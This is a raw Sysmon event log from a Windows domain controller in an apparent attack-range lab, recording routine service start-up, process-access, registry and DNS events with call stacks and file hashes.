13:33:24.430{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:24.430{59A5CD1D-8CA8-6005-0C00-00000000A201}4801096C:\Windows\system32\svchost.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:24.430{59A5CD1D-8CA8-6005-0C00-00000000A201}4801096C:\Windows\system32\svchost.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001e) 13241300x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001e) 12241200x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30 13241300x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000001) 12241200x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-DeleteValue2021-01-18 13:33:24.430{59A5CD1D-8C95-6005-0100-00000000A201}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1 22542200x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:22.432{59A5CD1D-8E22-6005-DD02-00000000A201}3540localhost0127.0.0.1;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 13241300x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.402{59A5CD1D-8CA9-6005-1100-00000000A201}1184C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.402{59A5CD1D-8CA9-6005-1100-00000000A201}1184C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:24.404{59A5CD1D-8CA9-6005-1600-00000000A201}1528C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000000) 10341000x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:24.388{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.996{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.975{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.975{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.973{59A5CD1D-8E44-6005-0A00-00000000A301}848936C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.964{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.960{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.960{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.945{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.944{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.944{59A5CD1D-8E56-6005-3300-00000000A301}2756C:\Windows\System32\wbem\unsecapp.exe10.0.14393.4169 (rs1_release.210107-1130)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=2443CA5962E2134CB389DCD5056D27AE,SHA256=018FF62BCDC292CF9290DB0574C8EF9C97EBC26933C8FC950DD8E6B2B91972FB,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.938{59A5CD1D-8E44-6005-0A00-00000000A301}848948C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3100-00000000A301}2524C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.925{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.924{59A5CD1D-8E44-6005-0A00-00000000A301}8481208C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.918{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.918{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.908{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.908{59A5CD1D-8E44-6005-0A00-00000000A301}848936C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.898{59A5CD1D-8E56-6005-3200-00000000A301}2692C:\Windows\System32\dfssvc.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.901{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.901{59A5CD1D-8E44-6005-0A00-00000000A301}8481136C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.843{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\System32\dfsrs.exe10.0.14393.4169 (rs1_release.210107-1130)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F2483716D6C752FB448C7295AA3B49A1,SHA256=6B77249159D3C217694B52F0B1C75E0649486EF4A3FE4513CD41D81E7DEB709A,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
